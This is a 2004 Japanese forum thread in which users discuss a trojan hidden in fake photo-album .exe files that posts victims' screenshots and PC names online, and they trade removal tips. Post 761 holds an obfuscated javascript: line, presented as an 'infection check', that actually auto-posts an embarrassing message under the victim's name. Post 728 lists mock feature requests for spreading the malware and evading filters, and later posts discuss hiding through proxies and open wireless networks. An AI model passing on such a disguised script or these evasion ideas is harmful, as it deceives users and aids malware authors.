【警報】Winnyを狙ったワーム・ウイルス情報 Part26
at DOWNLOAD
[前50を表示]
700:[名無し]さん(bin+cue).rar
04/09/23 04:27:59 rtwkFYAH
shellsystem.exe以外は無視してOK?
あとノートンで遮断した場合は画像は流れない?
701:[名無し]さん(bin+cue).rar
04/09/23 04:34:09 XZhKNgqY
なんだか調子に乗って改造した奴が先に逮捕されそう
702:[名無し]さん(bin+cue).rar
04/09/23 04:37:36 rMURrwFg
牛に我慢させるか
703:[名無し]さん(bin+cue).rar
04/09/23 04:40:22 EiFN9IZi
誤爆だ わりぃ
704:[名無し]さん(bin+cue).rar
04/09/23 04:44:18 62NRg8JO
これならとってもわかりやすい画像ですな
URLリンク(v.isp.2ch.net) もう典型的かと
705:[名無し]さん(bin+cue).rar
04/09/23 04:58:57 MZi2DiBQ
これxp以外は平気なの?
706:[名無し]さん(bin+cue).rar
04/09/23 04:59:21 SFKAhjW3
ノートンインターネットセキュリティの様なものが常駐してたら
プログラムによって勝手に晒されるようなことは無いよな?
707:[名無し]さん(bin+cue).rar
04/09/23 05:00:55 JtMoVLJN
URLリンク(plaza.rakuten.co.jp)
708:[名無し]さん(bin+cue).rar
04/09/23 05:02:56 g70Ywgh6
>>705
どうしてそういう結論になるのかが判らん。
>>706
設定次第。学習モードとかでユーザが勝手な通信を許可したら、
なんぼセキュリティソフトが入っててもそりゃアウトにもなる。
709:[名無し]さん(bin+cue).rar
04/09/23 05:04:36 Q7dG25BA
アップローダから知らないファイル落としたりしなきゃ、感染しないんだよな?
こうもいっぱいかかってると、最近何も落としてないのに不安になる
710:[名無し]さん(bin+cue).rar
04/09/23 05:04:47 MZi2DiBQ
>>708
ボロPCで感染実験してみたのさ(OS ME)
そんで晒されるか待ってるだけど、一向にうpされないんでつよ。
711:[名無し]さん(bin+cue).rar
04/09/23 05:05:29 4TL6YJ26
まぁ拡張子表示はしっかりしとけってこったな
712:[名無し]さん(bin+cue).rar
04/09/23 05:09:58 xduUn+v/
>>705
苺キンタマ(仮)は、Windows 98以降なら感染というか、踏んだら効果を示す
>>706
httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)
713:[名無し]さん(bin+cue).rar
04/09/23 05:10:25 5x3EooTF
URLリンク(v.isp.2ch.net)
貴様ッ見ているな!
714:[名無し]さん(bin+cue).rar
04/09/23 05:13:40 MZi2DiBQ
windows\shellsystem.exeはあったんだけど
レジストリは追加されてないんだよね
これじゃまだ感染しとらんのかね?
もう一回踏んでみるかな。。。
715:[名無し]さん(bin+cue).rar
04/09/23 05:14:27 57yhE0eV
PFW入れてれば、ウィルスが通信しようとしたのを検知してくれるんじゃないかい
何でもOKで通してれば意味無いけど
あと、SP2のPFWはアウトバウンド検知してくれないんだっけ?
716:[名無し]さん(bin+cue).rar
04/09/23 05:18:37 aY8YkHOS
URLリンク(strawberry.web-sv.com)
トロイらしいんだけど、だれか解析頼む。
717:[名無し]さん(bin+cue).rar
04/09/23 05:19:45 xduUn+v/
>>715
ウイルスというか、現時点ではトロイなんだが
通信といっても、書き込みと変わらんからf/wでの検知は難しい
XP SP2のf/wは、外→内のみ。
718:[名無し]さん(bin+cue).rar
04/09/23 05:25:36 JsiucGEH
結局はキンタマと同じでexeを実行しなければいいってことだけど
XPは標準で表示しないしな。
何でこんな仕様なんだorz
ところでアップローダスレを自分のユーザ名で検索してしまった香具師
ノシ
719:[名無し]さん(bin+cue).rar
04/09/23 05:25:48 eq0QK75x
俺もサンプルとして捕獲しておきたいんだが、苺1の1360の三点セットってやつでいいんだよね。
720:[名無し]さん(bin+cue).rar
04/09/23 05:27:02 Ypzo5dny
ってかny関係ないじゃん・・・
721:[名無し]さん(bin+cue).rar
04/09/23 05:28:00 0ylh05j4
スレタイでややこしくなってるね
722:[名無し]さん(bin+cue).rar
04/09/23 05:28:17 57yhE0eV
>>717
普通のPFWってEXEファイル単位で通信を検知して知らせてくれんじゃないの?
ループバックでも利用してない限りは大丈夫だと思うが
723:719
04/09/23 05:29:12 eq0QK75x
OK、これであってたようだ。
724:[名無し]さん(bin+cue).rar
04/09/23 05:29:54 MqBRPt/h
>httpを使うからWebが見られる環境ならアウト(f/wで80番閉じてれば別だが、web見られないよ)
>f/w
725:[名無し]さん(bin+cue).rar
04/09/23 05:33:52 Pi3bt/OK
おもしろそいので俺も捕獲しとこ
726:[名無し]さん(bin+cue).rar
04/09/23 05:34:21 AH6SroMo
さて、キンタマと違って
特定のサイトやアップローダーに書き込みを行う以上
そこから業務妨害で損害賠償請求されてもおかしくないトロイなんだが
ま、日本の警察じゃ作成者を特定できんだろうな・・・
でも、苺にexeファイルをアップした人間を特定して締め上げればいいのか?
727:[名無し]さん(bin+cue).rar
04/09/23 05:34:22 Pi3bt/OK
間違え;y=ー( ゚д゚)・∵. ターン
728:[名無し]さん(bin+cue).rar
04/09/23 05:50:14 U98tvZkV
要望まとめ
・複数のうpろだをランダムに使うように(2ちゃんねるアップローダーはやめれ)
・デスクトップ画像以外もうpするように(kakikomi.txtとか)
・繁殖機能。zipで適当なファイルといっしょにウィルス本体も固めてうp。
・Rock54対策。NGワードが含まれる書き込みが規制されるから晒しテンプレを複数作れば大丈夫か?
729:[名無し]さん(bin+cue).rar
04/09/23 05:50:39 VGKgqq6T
なんで怪しいexeファイルを実行すんのかなって思ってたけど
拡張子を表示しない設定だと初心者はわからんわな〜
730:[名無し]さん(bin+cue).rar
04/09/23 05:52:17 IFT2b9V5
>>728
要望するなよ(笑)
731:[名無し]さん(bin+cue).rar
04/09/23 05:52:23 4TL6YJ26
セキュリティに対する意識ってなかなかあがらないな
732:[名無し]さん(bin+cue).rar
04/09/23 05:54:24 fgnK5pHv
>>728
共犯者キタ━━━(゚∀゚)━━━ !!!!!
733:[名無し]さん(bin+cue).rar
04/09/23 05:56:44 tcoLxpqV
人間のロリ好きってアニメ、ゲームも好む傾向があるんだな。
なかなか興味深かった。
734:[名無し]さん(bin+cue).rar
04/09/23 05:58:31 cTDJ+/Lv
kakikomi晒されたら辛いな
他の情報で個人割れてたらきっと死人が出る
735:[名無し]さん(bin+cue).rar
04/09/23 06:07:00 JsiucGEH
exeごとに通信制御するNortonとかのFWは
ポート80番使ってようとブロックするんじゃないの?
736:[名無し]さん(bin+cue).rar
04/09/23 06:09:13 IFT2b9V5
>>735
する。というか、初物がソケットひらこうとしたときに騒ぐ。
737:[名無し]さん(bin+cue).rar
04/09/23 06:10:23 0ylh05j4
で、エロの魔力で許可するをクリック!
738:[名無し]さん(bin+cue).rar
04/09/23 06:18:26 0jfdhz8j
簡易プロテクト?
C:\WINDOWS>copy notepad.exe shellsystem.exe
C:\WINDOWS>attrib +R shellsystem.exe
とりあえず実験用の98SE環境ではうまくいった。
メインマシンで実験する度胸はないので、XPなどでは不明。
739:[名無し]さん(bin+cue).rar
04/09/23 06:25:02 J6w/KxT0
これ犯人たどれるだろ。ネットカフェとかかな?
740:[名無し]さん(bin+cue).rar
04/09/23 06:26:03 IFT2b9V5
>>739
踏み台はさまってたら無理
741:[名無し]さん(bin+cue).rar
04/09/23 06:29:08 J6w/KxT0
>>740
プロバイダに問い合わせりゃアクセス記録のこってんじゃないの?
742:[名無し]さん(bin+cue).rar
04/09/23 06:32:12 IFT2b9V5
>>741
ドコのプロバイダに問い合わせるの?
743:[名無し]さん(bin+cue).rar
04/09/23 06:32:29 JsiucGEH
海外プロキシを多段でかましてればよほどのことがないと
たどれてもたどらないと思う。
744:[名無し]さん(bin+cue).rar
04/09/23 06:35:42 J6w/KxT0
>>742
踏み台のだよ。
745:[名無し]さん(bin+cue).rar
04/09/23 06:38:02 IFT2b9V5
>>744
もし俺が犯人だったとしたら、踏み台にしろ串にしろ
一段ではやらないだろうね。捕まりたくないし。
746:[名無し]さん(bin+cue).rar
04/09/23 06:40:16 xduUn+v/
>>739
追求のキーになるのが >>688で報告した
> Software\Meropa ??なんだろこのディレクトリ
なんだが、こんなディレクトリを作るアプリは、かなーり特殊な
半導体設計用のものらしい。こんなの入れてる人間は国内では限られる。
ここから手繰るのがよさげ。スキルは相当と思えるので、配布元から掘るのは難しそう
747:[名無し]さん(bin+cue).rar
04/09/23 06:40:33 J6w/KxT0
>>745
俺がもし被害者だったら100段くらいまでは頑張ってたどるよw
この手のウイルスは犯人が殺されても不思議じゃないと思うんだが。
748:[名無し]さん(bin+cue).rar
04/09/23 06:44:13 xduUn+v/
>>747
そこいらに、いくらでもある
WEP無効の無線LANを踏み台にしてたら、
多段串・海外串なんか使わなくても
たどるのは難しい。
749:[名無し]さん(bin+cue).rar
04/09/23 06:44:40 J6w/KxT0
殺されるは言い過ぎかw でもなんらかの報復は受けると思う。
つーか踏み台に時限セットされたものなら辿るの不可能っぽいな・・
750:[名無し]さん(bin+cue).rar
04/09/23 06:45:30 zW53Q5jb
ネカフェで時限式アップロードするように仕込んだとか。
751:[名無し]さん(bin+cue).rar
04/09/23 06:46:34 99Ier2R9
頑張れ。
752:[名無し]さん(bin+cue).rar
04/09/23 07:02:00 CBy0Cio6
こうゆうのを見ると2chやnyする人ってヒッ●ーだけなのかなって思うね
URLリンク(v.isp.2ch.net)
ウイルスに気づかずに必死に抜いている人1名w
753:469
04/09/23 07:04:35 kh8TR4yq
これって本人達が寝てる間は安全なんだね。
754:[名無し]さん(bin+cue).rar
04/09/23 07:08:11 kh8TR4yq
数字消すの忘れた・・・_| ̄|○
755:[名無し]さん(bin+cue).rar
04/09/23 07:08:12 CBy0Cio6
どうせなら、SS、PC名だけじゃなくて、
IP・ホストも晒してほしかったな
756:[名無し]さん(bin+cue).rar
04/09/23 07:12:12 IFT2b9V5
>>752
これは狙ってやってる気がしないではないな(笑)
757:[名無し]さん(bin+cue).rar
04/09/23 07:45:55 CtAJ3p7u
俺はこんなウイルスは怖くて作れないな
何が怖いって狙われるのが怖いね
作った奴は絶対に捕まらないと思ってるんだから
本気になって追ってみたら面白いことになるかも
例えばウイルス作者が警察だったりしたらヤバイだろうし。
そうじゃなくても作った奴は確実に追われた後人生終わるだろうし
そんな一世一代の大事俺は出来ない
758:[名無し]さん(bin+cue).rar
04/09/23 08:14:59 wZ9Gu9IX
新種ウイルスと聞いてきました
759:[名無し]さん(bin+cue).rar
04/09/23 08:15:35 iqYKdWhe
面白い事考える奴もいるもんだな
760:[名無し]さん(bin+cue).rar
04/09/23 08:18:41 U98tvZkV
Winnyは関係ないけどな。
今やってるのはShareで回ってるふしあなで2ch書き込みと半虹の苺キンタマ
761:[名無し]さん(bin+cue).rar
04/09/23 08:25:55 U98tvZkV
便乗してこれまで流行ってる
JavaScript:document.body.innerHTMLのガイドライン2
スレリンク(gline板:595-586番)
感染確認するには
2ch専用ブラウザを使用している人は、IEなどの一般的なブラウザでこのスレを開いておく。
1、
javascript:s='7769746828646f63756d656e742e666f726d735b305d297b
46524f4d2e76616c75653d2766757369616e6173616e273b4d455353414
7452e76616c75653d275c75333045445c75333045415c75373533425c75
353043465c75333034465c75333036305c75333035355c7533303434273
b7375626d69742e636c69636b28293b7d';for(l=0,e="";l<s.length;l+=2)e+=
'%'+s.substr(l,2);eval(unescape(e));
をクリップボードにコピーし、メモ帳などのテキストエディタに貼り付ける。
2、 改行を外して1行にする。
3、 1行にしたものをクリップボードにコピーし、アドレスバーに貼り付ける。
4、 Enterを押す(もしくは「移動」をクリックする)。
エラーが出れば感染してます
762:[名無し]さん(bin+cue).rar
04/09/23 08:26:46 U98tvZkV
>>761
参照間違えた・・
スレリンク(gline板:595-596番)
763:[名無し]さん(bin+cue).rar
04/09/23 08:27:19 1gUyhrM3
764:[名無し]さん(bin+cue).rar
04/09/23 08:51:04 SPCjNc3y
俺はペケピーがはじめての初心者だが、拡張子表示は真っ先にやったぞ…。
まぁ、かつては黒羊とメールストームをふんだ苦い経験持ちだが。
765:[名無し]さん(bin+cue).rar
04/09/23 09:07:42 SY1J+4JW
>>761
ワロタ
ロリ画像ですか
766:[名無し]さん(bin+cue).rar
04/09/23 09:08:11 GmtpX3PS
【使用OS】WinXP
【WindowsUpdateしてるか】はい。
【AntiVirusは】 ??
【ちゃんとUpdateしてるか】??
【スキャンした結果】オンラインにてスキャン
【オンラインスキャンしたならその結果は】いつもなら数個出るのに、不自然なぐらい何も検出されませんでした。
【Winnyのバージョン】使ってません。ネットでウィルス貰いました。
【Winny歴、総DL量は】 無し
【テンプレを読んだか】 はい。
【テンプレにある対策を実行したか】 実行しました。特に何も無かったです。
【症状か具体的に、分かる限りすべて書く】 何となく、重い。動作が鈍い。
【何をしたらそんなことになったのか】 うpされてたファイルを開いたら。
【これまでにとった措置】オンラインスキャンのみ。
767:[名無し]さん(bin+cue).rar
04/09/23 09:12:14 U98tvZkV
>>766
(写真集) (ロリータ) 水原友里.exe
(写真集) (ロリータ) 相田香奈子.exe
コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
どれか開いた?
768:[名無し]さん(bin+cue).rar
04/09/23 09:19:52 Jz5Ghtix
キンタマ作った香具師、逮捕されたのか
769:[名無し]さん(bin+cue).rar
04/09/23 09:25:30 GmtpX3PS
>>767
開いたというか、ダブルクリックして開こうとした。
どれだったか覚えてない…。多分、2回ぐらい開こうとした。
何か怪しかったし、急にPCの反応がおかしくなったから、速攻電源切りました。
その後にまた起動して、全部ゴミ箱に捨てて、ゴミ箱も空にしました。
770:[名無し]さん(bin+cue).rar
04/09/23 09:28:46 kh8TR4yq
>>769
もう遅いw
とりあえず↓に来い。
削除の方法が分かるかもしれない。
アップローダーってずるい
スレリンク(ascii2d板)
771:[名無し]さん(bin+cue).rar
04/09/23 09:28:49 j/Jnnczc
>>769
今すぐネットを切断
C:\WINDOWSフォルダの中でshellsystem.exeを消せ
再起動して後は知ってるならレジストリの自動実行の辺りを探せ
急げ
772:[名無し]さん(bin+cue).rar
04/09/23 09:29:12 U98tvZkV
>>769
とりあえずユーザ名とコンピュータ名を晒せ。
マイコンピュータのプロパティから見れる。
773:[名無し]さん(bin+cue).rar
04/09/23 09:30:19 afWjuRcq
>>766
ご愁傷様
774:[名無し]さん(bin+cue).rar
04/09/23 09:30:56 0ylh05j4
>>685
を見て確認してみ
775:[名無し]さん(bin+cue).rar
04/09/23 09:41:27 P9SKfCRL
>>762
596 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 22:21:33 ID:aLtl7+rE<
>>595のやつやると名前欄fusianasan、本文ロリ画像くださいで勝手に投稿されるってわけか?
597 名前:水先案名無い人[] 投稿日:04/09/21(火) 23:16:48 ID:raTTdWET<
16進でご苦労な事だ。
598 名前:p29d3b8.urawac00.ap.so-net.ne.jp[] 投稿日:04/09/21(火) 23:18:09 ID:ItaWKNCP<
ロリ画像ください
599 名前:水先案名無い人[sage] 投稿日:04/09/21(火) 23:18:27 ID:ItaWKNCP<
orz
600 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 00:18:50 ID:8s+8uxdE<
おらは投稿確認が出て助かっただ
601 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 01:00:01 ID:A3RcQubp<
そいえば、たいていの掲示板ってhttpだからポストする時に
暗号化されていないデータが云々のダイアログを出せるはずだが、
それを解除してる人って結構多いみたいだね。
602 名前:zaq3d2e96f7.zaq.ne.jp[] 投稿日:04/09/22(水) 02:42:09 ID:nVW0EyTb<
ロリ画像ください
603 名前:濡れ衣 zaq3d2e96f7.zaq.ne.jp ◆SbICHIROZ6 [sage] 投稿日:04/09/22(水) 02:43:59 ID:nVW0EyTb<
570はどうなるかちゃんと書いておいてくれよ。。
リモホ晒すのは構わないけど、テストスレになっちまうぞ
604 名前:水先案名無い人[sage] 投稿日:04/09/22(水) 03:55:11 ID:7PnzxniJ<
いかん、笑いが止まらんw
やらんでよかったw
776:[名無し]さん(bin+cue).rar
04/09/23 09:47:30 tcoLxpqV
ノートンでスキャン中の画像がよく晒されてたけど
対策ソフト入れてると安心するから簡単に引っかかるんじゃないの。
しかもこういう祭り時には無力。全くの無駄金だな。
777:[名無し]さん(bin+cue).rar
04/09/23 09:53:59 qlyssBj7
拡張子表示は鬱陶しいし、長いスペースとかがあるから詳細表示のファイルの種類で判断してるなぁ
778:[名無し]さん(bin+cue).rar
04/09/23 09:55:34 GmtpX3PS
>>771
そのレジストリとやらは良く分からんが…
まあ、とりあえず初心者板で聞いてくる。
検索したらshellsystem.exeが見付かった。
とりあえず、急ぎます。ありがとう。
779:[名無し]さん(bin+cue).rar
04/09/23 09:57:12 cDvdfQLH
>拡張子表示は鬱陶しい
ハァ?
780:[名無し]さん(bin+cue).rar
04/09/23 10:00:05 /EYVc77v
明かされてる画像みても無害?
781:[名無し]さん(bin+cue).rar
04/09/23 10:01:16 xduUn+v/
いくらノートン先生でも、登場したてのトロイにすぐには反応できませんぜ
今回の作成日時は、3本とも22日15:57 流されたのが夕方としても、まだ
10時間しかたってない。しかも踏んでるやつ大杉。
作者も、これほどの効果を期待してなかっただろーな。そうでなきゃアプロダ
が落ちるというのも考慮してると思う。この反応からして、ここ数日間に数種の
亜種が出てくると思う。トロイの改変も楽勝っぽいので、便乗犯も多そう。
一番のセキュリティホールは、ユーザーの意識だもんよ。
782:[名無し]さん(bin+cue).rar
04/09/23 10:03:05 Ze0M08FR
ちなみにキンタマが発見されたのが3月半ば。対応は3月末。
783:[名無し]さん(bin+cue).rar
04/09/23 10:03:32 kDRZUavo
歴史は繰り返す。
784:[名無し]さん(bin+cue).rar
04/09/23 10:05:29 4TL6YJ26
そして人は学ばない
785:[名無し]さん(bin+cue).rar
04/09/23 10:07:05 7loVoFeI
mp3の名前などを勝手にいじるウィルスってあります?
786:[名無し]さん(bin+cue).rar
04/09/23 10:08:25 LvJ+JBBu
>>729
アイコンでわかるだろ?
787:[名無し]さん(bin+cue).rar
04/09/23 10:12:17 kDRZUavo
>>786
アイコンがフォルダアイコンに偽装されてるから無知が実行する。
788:[名無し]さん(bin+cue).rar
04/09/23 10:16:24 qJ0+JsGI
で、誰かウイルス駆除ソフト屋さんに報告したの?
789:[名無し]さん(bin+cue).rar
04/09/23 10:23:29 iqYKdWhe
>>780
画像自体は無害。
って、こんな程度の知識の人が踏むんだろうなぁ。
790:[名無し]さん(bin+cue).rar
04/09/23 10:29:04 ky5A4Ls4
>>789
URLリンク(www.microsoft.com)
こんなのがあるから一概には大丈夫とは言えないかもしれない
791:[名無し]さん(bin+cue).rar
04/09/23 10:30:06 0lvmtZMl
>>789
っていう、おまえも相当やばいのだが
792:[名無し]さん(bin+cue).rar
04/09/23 10:32:33 cDvdfQLH
>>789
,、ァ
,、 '";ィ'
________ /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、 __,,,,......,,,,_/:::::::::/: !|
. : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l| またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ! ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙::: rー-:'、 / }¬、
. \::゙、: : : :./::::::::::::::;、-''":::::::::: ,...,:::,::., :::':、 _,,/,, ,、.,/ }
ヽ:ヽ、 /::::::::::::::::::::::::: _ `゙''‐''" __,,',,,,___ /~ ヾ::::ツ,、-/
`ヽ、:::::::::;;;、、--‐‐'''''',,iニ- _| 、-l、,},,  ̄""'''¬-, ' ''‐-、 .,ノ'゙,i';;;;ツ
_,,,、-‐l'''"´:::::::' ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ,.' j゙,,, ´ 7
,、-''" .l:::::::::::;、-''" ,.-' ゙、""ヾ'r-;;:l 冫、 ヽ、 / __,,.ノ:::::ヽ. /
l;、-'゙: ,/ ゞ=‐'"~゙゙') ./. \ / '''"/::::;:::;r-''‐ヽ
,、‐゙ ヽ:::::..,.r'゙ ,,. ,r/ ./ ヽ. ,' '、ノ''" ノ
,、‐'゙ ン;"::::::. "´ '゙ ´ / ゙、 ,' /
' //::::::::: {. V /
/ ./::::::::::::: ', / /
. / /:::::::::::::::::. ',. / ,.、 /
793:[名無し]さん(bin+cue).rar
04/09/23 10:35:22 iqYKdWhe
>>790-792
いやあ、もちろんgdiplus.dllは知ってますって。わざわざ書かなくていいかと思ったんだけど。
こんなにレスが付くとは…。
794:[名無し]さん(bin+cue).rar
04/09/23 10:36:31 cDvdfQLH
>>793
,、ァ
,、 '";ィ'
________ /::::::/l:l
─- 、::::;;;;;;;;;`゙゙''‐ 、 __,,,,......,,,,_/:::::::::/: !|
. : : : : : : `゙'ヽ、:::゙ヾ´::::::::::::::::::::::`゙゙゙'''‐'、. l| またまた ご冗談を
、、 . : : : : : : : : r'":::::::::::::::::::::::::,r':ぃ::::ヽ::::::::ヽ! ,、- 、
.ヽ:゙ヽ; : : : : : :ノ:::::::::::::::::::::;;、-、、゙::: rー-:'、 / }¬、
. \::゙、: : : :./::::::::::::::;、-''":::::::::: ,...,:::,::., :::':、 _,,/,, ,、.,/ }
ヽ:ヽ、 /::::::::::::::::::::::::: _ `゙''‐''" __,,',,,,___ /~ ヾ::::ツ,、-/
`ヽ、:::::::::;;;、、--‐‐'''''',,iニ- _| 、-l、,},,  ̄""'''¬-, ' ''‐-、 .,ノ'゙,i';;;;ツ
_,,,、-‐l'''"´:::::::' ,、-'" ,.X,_,,、-v'"''゙''yr-ヽ / ゙゙'ヽ、, ,.' j゙,,, ´ 7
,、-''" .l:::::::::::;、-''" ,.-' ゙、""ヾ'r-;;:l 冫、 ヽ、 / __,,.ノ:::::ヽ. /
l;、-'゙: ,/ ゞ=‐'"~゙゙') ./. \ / '''"/::::;:::;r-''‐ヽ
,、‐゙ ヽ:::::..,.r'゙ ,,. ,r/ ./ ヽ. ,' '、ノ''" ノ
,、‐'゙ ン;"::::::. "´ '゙ ´ / ゙、 ,' /
' //::::::::: {. V /
/ ./::::::::::::: ', / /
. / /:::::::::::::::::. ',. / ,.、 /
795:[名無し]さん(bin+cue).rar
04/09/23 10:37:15 iqYKdWhe
んー、でもよく考えると俺が間違ってるな。MSのGDI+の事も書けばよかった。
796:[名無し]さん(bin+cue).rar
04/09/23 10:37:27 xduUn+v/
今回のに限っていえば、晒されてるjpegは今のとこ無害だからな。
便乗してアプロに仕込むやつもいそうだが
797:[名無し]さん(bin+cue).rar
04/09/23 10:41:34 xduUn+v/
つーか、GDI+対策しないで、今頃jpeg開く香具師が悪いと思われ
パッチがあがった時点から危険度急上昇だぞ
798:[名無し]さん(bin+cue).rar
04/09/23 10:42:55 EMRLV6EZ
jpgで感染!?(゚д゚)すんのかよ!?
799:[名無し]さん(bin+cue).rar
04/09/23 10:45:36 LvJ+JBBu
>>798
するよ〜、jpg見るどころか、うpロダ逝ったら即感染ですよ
怖いよ〜ウィルスわ
800:[名無し]さん(bin+cue).rar
04/09/23 10:52:21 ky5A4Ls4
まあ、SP2な俺には関係ないが
801:[名無し]さん(bin+cue).rar
04/09/23 10:54:42 iqYKdWhe
>>798
まだしてないなら、すぐWindowsUpdataした方がいいよ。
って、「重要なパッチは、もうすでに当ててるだろ?」って認識で話するのは、やっぱり
やめた方がよさそうだな。そこが間違ってた。それに今後も新しく判明した画像処理の
脆弱性をついたウィルスが、現れない保証もない。これからは画像も油断できないと
言う事か。
802:[名無し]さん(bin+cue).rar
04/09/23 10:55:44 jZRbqOye
>>801
SP2を入れると不具合出そうで恐いよ〜。
803:[名無し]さん(bin+cue).rar
04/09/23 10:56:54 ky5A4Ls4
URLリンク(www.openwall.com)
とりあえずテストページ。ここの"I am ready to die."を踏んでクラッシュしたら
SP2を当てるかWindowsUpdateしないと危険。ちなみにノートソが反応するから、
ウイルス対策ソフト入れてる人は安心してもいいかもしれない
804:[名無し]さん(bin+cue).rar
04/09/23 11:07:06 EMRLV6EZ
2chブラウザのjpg垣間見機能でもだめか?
805:[名無し]さん(bin+cue).rar
04/09/23 11:12:11 jZxILG0u
>766
LANケーブル抜いてネット切断、それで首吊れ
806:[名無し]さん(bin+cue).rar
04/09/23 11:12:12 zW53Q5jb
苺きんたま対策(仮)
URLリンク(www.geocities.jp)
まとめサイトできたようだ
807:[名無し]さん(bin+cue).rar
04/09/23 11:14:52 2DsdDYOp
>>469
ダウンロードできないんだけど、もう削除されたかな?
808:[名無し]さん(bin+cue).rar
04/09/23 11:22:10 PFKtStB6
>>766
再起動してタスクマネージャー開いてプロセス見ろ。
それでshellsystem.exeを終了させろ。
これで動作は速くなる。
あとはレジストリでshellsystem.exeを削除すれば終了
809:[名無し]さん(bin+cue).rar
04/09/23 11:24:03 sH8yfJe2
マルチプロセスだからタスクマネージャからは消せんぞ。
810:[名無し]さん(bin+cue).rar
04/09/23 11:27:07 PFKtStB6
>>809
遊びで感染したんだが、再起動させたら俺は消せた。
なんでかはわからん
811:[名無し]さん(bin+cue).rar
04/09/23 11:31:26 cDvdfQLH
112 名前:eatkyo287016.adsl.ppp.infoweb.ne.jp@Share使用中 ◆i.ESDXOLYY [] 投稿日:04/09/23 10:43:42 ID:La2FDeZx
{Now!}俺のクリップボード(50byte 10行抜粋版, 何もコピーしてません)
〜何も無いので環境変数晒し〜
コンピュータ名: VIP
ユーザー名: takehiro
ワロタ
812:[名無し]さん(bin+cue).rar
04/09/23 12:35:25 2aG10cCS
俺どうせ割れ窓だから笑えるユーザー名でわざと踏んで晒してみるか
ほりえもんとか毎日新聞で凶悪ぺド画像とか
813:[名無し]さん(bin+cue).rar
04/09/23 12:43:24 IQ9BvSXd
しまった、祭りに乗り遅れた。
nyか洒落にあがってないかな(w
814:[名無し]さん(bin+cue).rar
04/09/23 12:45:03 tyH5EMtg
>>813
京都府警にしてよ
815:[名無し]さん(bin+cue).rar
04/09/23 12:46:19 k8gkpGNZ
このトロイの動作解説ページってまだないかな。
なんかおもしろそうだから感染させてみたいんだが。
816:[名無し]さん(bin+cue).rar
04/09/23 12:46:30 IqZ2HObi
× しまった、祭りに乗り遅れた。
○ うお
完璧乗り遅れた
817:[名無し]さん(bin+cue).rar
04/09/23 12:49:27 k8gkpGNZ
Winnyを立ち上げてない限り,被害はないんだろ?
何で祭りになってんだ??
818:[名無し]さん(bin+cue).rar
04/09/23 12:51:17 cDvdfQLH
初級ネットワーク板ローカルルール申請
スレリンク(operate板)
Share10_a56 + [9月21日付]ノードリストの文字列が多い・・・あやしいな
819:[名無し]さん(bin+cue).rar
04/09/23 12:56:30 J5HdIDac
「Share10_a56 + [9月21日付]ノードリスト」ってファイルにウィルス入ってるんだろうな
820:[名無し]さん(bin+cue).rar
04/09/23 12:57:37 pr4shzQV
>>817
nyは関係ない
821:[名無し]さん(bin+cue).rar
04/09/23 12:59:51 lSmv7nYn
ファイル名変えて、あちこちに貼られてら。
822:[名無し]さん(bin+cue).rar
04/09/23 13:00:20 xCg9vDsC
なんか、もれのデスクトップ画像が2chアプロと言う
どこかにアップされているらしいです。
それを見て自分を笑いたいのですが、どこにあるか
分かりますでしょうか。
823:[名無し]さん(bin+cue).rar
04/09/23 13:00:37 RdY8SqQw
俺はVirtual PC上のWinMEでny実行してるから、晒されても問題ないな。
しかもホストOSはOS Xだし
824:[名無し]さん(bin+cue).rar
04/09/23 13:02:37 cDvdfQLH
Share10_a56 + [9月21日付]ノードリスト 18禁無修正ガンダム画像映画動画一般コミックエロゲ
PS2PV巨乳アニメゲーム一般ゲームサントラアルバムMAD無修正アプリ写真集DVD.zip
1,219,360
13deb3c8b87346cd5b1a9de9029c855fc7b6128e
これか
825:[名無し]さん(bin+cue).rar
04/09/23 13:08:21 NktT5qfN
7-zip反則だな。これなら1/3近くにもなるわけだ。
7-Zip (A) 3.12 Copyright (c) 1999-2003 Igor Pavlov 2003-12-10
Listing archive: F:\DESKTOP\キンタ~1.7Z
Date Time Attr Size Compressed Name
------------------- ----- ------------ ------------ ------------
2004-09-22 15:57:10 ....A 677376 319288 (写真集) (ロリータ) 水原友里.exe
2004-09-22 15:57:10 ....A 677376 0 (写真集) (ロリータ) 相田香奈子.exe
2004-09-22 15:57:10 ....A 677376 0 コピー 〜 (写真集) (ロリータ) 河瀬菜美.exe
------------------- ----- ------------ ------------ ------------
2032128 319288 3 files
キンタ~1 7Z 319,524 04-09-23 12:58 キンタマ詰合.up1360.7z
キンタ~1 BZA 1,003,287 04-09-23 13:00 キンタマ詰合.up1360.bza
キンタ~1 CAB 1,032,957 04-09-23 13:00 キンタマ詰合.up1360.cab
キンタ~1 YZ1 1,055,366 04-09-23 12:58 キンタマ詰合.up1360.yz1
キンタ~1 ZIP 1,033,786 04-09-22 21:25 キンタマ詰合.up1360.zip
826:[名無し]さん(bin+cue).rar
04/09/23 13:09:25 cDvdfQLH
ナニソレ
827:[名無し]さん(bin+cue).rar
04/09/23 13:14:14 EKR+VzAM
これってjpgのリンク踏んだだけで感染するんですか
828:[名無し]さん(bin+cue).rar
04/09/23 13:17:14 cDvdfQLH
no
829:[名無し]さん(bin+cue).rar
04/09/23 13:29:10 JTze3qp6
SSの機能を無効にする方法って無いの?
830:[名無し]さん(bin+cue).rar
04/09/23 13:30:03 H4H6HXnY
新種のキンタマが開発されたと聞いて飛んできました
ノートン先生がスルー・・・? ガクガクブルブル
831:[名無し]さん(bin+cue).rar
04/09/23 13:32:02 joit0XmS
ファイル踏んだ覚えないのにshellsystem.exeがレジストリにあった場合は
感染してるんでしょうか
プロセスなどにはshellsystem.exeはありませんでした
832:[名無し]さん(bin+cue).rar
04/09/23 13:34:53 Y12C9VC7
>>831
どうせ検索の履歴だろ
833:[名無し]さん(bin+cue).rar
04/09/23 13:35:15 H4H6HXnY
>>831
削除するに越した事は無いんじゃないですか?
834:[名無し]さん(bin+cue).rar
04/09/23 13:39:50 joit0XmS
Microsoft\search Assiant\ACMru\5603の位置にあったので検索履歴みたいです
ありがとうございました
